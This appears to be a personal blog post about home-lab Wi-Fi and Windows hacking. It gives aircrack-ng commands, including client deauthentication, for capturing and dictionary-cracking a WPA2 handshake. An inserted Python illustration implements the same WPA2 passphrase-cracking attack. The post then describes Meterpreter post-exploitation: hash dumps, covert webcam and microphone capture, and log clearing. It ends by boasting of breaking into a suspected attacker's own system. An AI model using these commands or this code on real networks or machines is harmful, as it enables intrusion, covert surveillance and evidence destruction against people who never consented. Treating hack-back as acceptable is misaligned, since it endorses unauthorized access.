So my wife wasn’t well for most of the weekend and the kids were busy doing their stuff, so I got some time to play around 🙂 in my home lab. So here’s the thing:
It took me less than 5 minutes to obtain a WPA2 handshake, and less than 5 seconds to brute-force the *.cap file that contained the password; post-handshake, obviously, it’s only as good as your word list.
Key commands are:
airodump-ng [monitor interface]    # scan for nearby networks; note the target's BSSID and channel (monitor interface created beforehand with airmon-ng)
airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]    # lock onto that channel/BSSID and write capture files (prefix) under /root/Desktop/
aireplay-ng -0 2 -a [router bssid] -c [client bssid] [monitor interface]    # send 2 deauth frames to the client so it reconnects and the 4-way handshake lands in the capture
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap    # -a2 = WPA-PSK mode: dictionary attack against the captured handshake
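What that last command is actually doing, and why the result is only as good as the word list: aircrack-ng does not decrypt anything in the .cap file. It derives the PMK from each candidate passphrase and the SSID (PBKDF2-HMAC-SHA1, 4096 rounds), expands it to the PTK using the MAC addresses and nonces from the handshake, and checks whether the resulting KCK reproduces the MIC captured in handshake message 2. The Python below is an added illustration of that derivation and comparison; it is not code from the original post or from the aircrack-ng project. The SSID, MAC addresses, nonces and EAPOL frame bytes are constructed here, and the "captured" MIC is derived from a known passphrase so the whole thing runs offline.

```python
import hashlib
import hmac

# WPA2-PSK key hierarchy constants (IEEE 802.11i / RSN).
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32
PTK_LEN = 48                       # CCMP PTK: KCK(16) || KEK(16) || TK(16)
PRF_LABEL = b"Pairwise key expansion"
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).
    This is the cost a cracker pays once per wordlist entry; the SSID salt
    means a precomputed table only helps for that one network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def prf(key: bytes, label: bytes, data: bytes, out_len: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < out_len:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:out_len]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, label, min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces))."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, PRF_LABEL, data, PTK_LEN)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key MIC for key-descriptor version 2 (WPA2/CCMP): HMAC-SHA1 truncated to
    128 bits over the EAPOL-Key frame with its MIC field set to zero."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:MIC_LEN]


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol_mic_zeroed, captured_mic, wordlist):
    """Dictionary attack: for each candidate derive PMK -> PTK -> KCK and compare the
    recomputed MIC with the one captured from handshake message 2.
    Returns the passphrase on a match, or None if the wordlist does not contain it."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:      # WPA passphrase length rule; skip junk cheaply
            continue
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_mic_zeroed), captured_mic):
            return candidate
    return None


# --- Constructed sample "capture" (not from a real network). The MIC is derived
# below from a known passphrase so the example is self-contained and offline.
SSID = "homelab"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Stand-in for the second EAPOL-Key frame with its 16-byte MIC field zeroed
# (layout simplified; a real cracker copies the frame bytes out of the .cap).
EAPOL_MSG2 = bytes.fromhex("0103005f02010a0000000000000000000001") + SNONCE + bytes(60)
_TRUE_PSK = "correcthorse"          # the secret the wordlist has to contain
CAPTURED_MIC = eapol_mic(
    ptk_from_pmk(pmk_from_passphrase(_TRUE_PSK, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16],
    EAPOL_MSG2)


def demo(wordlist=("password", "letmein", "correcthorse", "12345678")):
    """Run the attack against the constructed capture with the given wordlist."""
    return crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2, CAPTURED_MIC, wordlist)


if __name__ == "__main__":
    print("recovered:", demo())                              # recovered: correcthorse
    print("not in list:", demo(["password", "letmein"]))    # not in list: None
```

The cost is entirely in `pmk_from_passphrase`: 4096 HMAC-SHA1 rounds per candidate, which is why a GPU cracker or a precomputed PMK table for a common SSID turns "minutes" into "seconds", and why a passphrase that is not in any word list is never found this way at all.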
Further to that, and in about as much time as it took me to read up on Meterpreter (with recognition to Offensive Security), I was able to access a couple of Windows PCs on my test network. Not only was I able to access the target machines, I obtained a hashdump, took a screenshot, took remote control, opened a shell/cmd, downloaded a file and, probably the most impressive and most worrying, was able to run the remote webcam, taking a snap and a continuous stream, along with audio recording from the microphone on those target machines. Oh… and I cleared the logs as I left the scene, all within a couple of hours.
So keep those systems secure and up to date, peeps!
Thank you for the continual attempts to try and access my system at home; it’s been very annoying. Oh, and btw, it took me a mere 5 minutes to access yours (with the intent of finding out who you are to advise that your systems have been accessed, of course), and I should probably brush up on my South American some…
and another one……